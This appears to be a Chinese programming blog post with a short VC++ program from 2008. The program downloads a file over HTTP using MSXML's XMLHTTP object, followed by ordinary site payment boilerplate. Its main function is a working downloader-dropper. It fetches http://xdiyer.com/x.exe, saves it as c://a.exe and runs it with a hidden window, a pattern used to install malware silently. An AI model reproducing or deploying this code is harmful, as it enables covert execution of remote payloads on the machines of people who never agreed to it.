vc++关于的下载的

// xml.cpp : By CoolDiyer 2008/4/9 14:03
//
#pragma comment(linker, “/subsystem:windows /FILEALIGN:0×200 /opt:nowin98“)

#include <windows.h>
#include <atlbase.h>
#import “msxml.dll”
bool URLDownloadToFile(LPCTSTR szURL, LPCTSTR szFileName)
{
 MSXML::IXMLHttpRequestPtr xmlHttp = NULL;
 HRESULT hr;
 BSTR bstrstring = NULL;
 hr = xmlHttp.CreateInstance(”msxml2.xmlhttp“);
 if (!SUCCEEDED(hr)) return false;
 hr = xmlHttp->open(”GET“, szURL, false);
 if (!SUCCEEDED(hr)) return false;
 hr = xmlHttp->send();
 if (!SUCCEEDED(hr)) return false;
 xmlHttp->get_responseText(&bstrstring);
 if (!SUCCEEDED(hr)) return false;

 VARIANT vValue;
 xmlHttp->get_responseStream(&vValue);

 IStream *pIStream = NULL;
 STATSTG StatStg;
 pIStream = (IStream*)vValue.punkVal;  //取得流对象指针
 pIStream->Stat(&StatStg, NULL);
 ULONG nSize = ULONG(StatStg.cbSize.QuadPart);  //取得文件的长度

 HANDLE hFile  = CreateFile(szFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

 BYTE lpBuffer[1024];
 DWORD dwBytesWritten = 0;
 ULONG uLen;
 while (nSize > 0)
 {
  pIStream->Read(lpBuffer, min(nSize,1024), &uLen); //防止文件过大
  WriteFile(hFile, lpBuffer, uLen, &dwBytesWritten, NULL);
  nSize -= uLen;
 }
 CloseHandle(hFile);
 if (pIStream)
 {
  pIStream->Release();
  pIStream = NULL;
 }
 return true;
}

int WINAPI WinMain(
       HINSTANCE hInstance,      // handle to current instance
       HINSTANCE hPrevInstance,  // handle to previous instance
       LPSTR lpCmdLine,          // command line
       int nCmdShow              // show state
)
{
 CoInitialize(NULL);
 char *lpszFile = “c://a.exe“;
 URLDownloadToFile(”http://xdiyer.com/x.exe“, lpszFile);
 WinExec(lpszFile, SW_HIDE);
 CoUninitialize();
 return 0;
}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值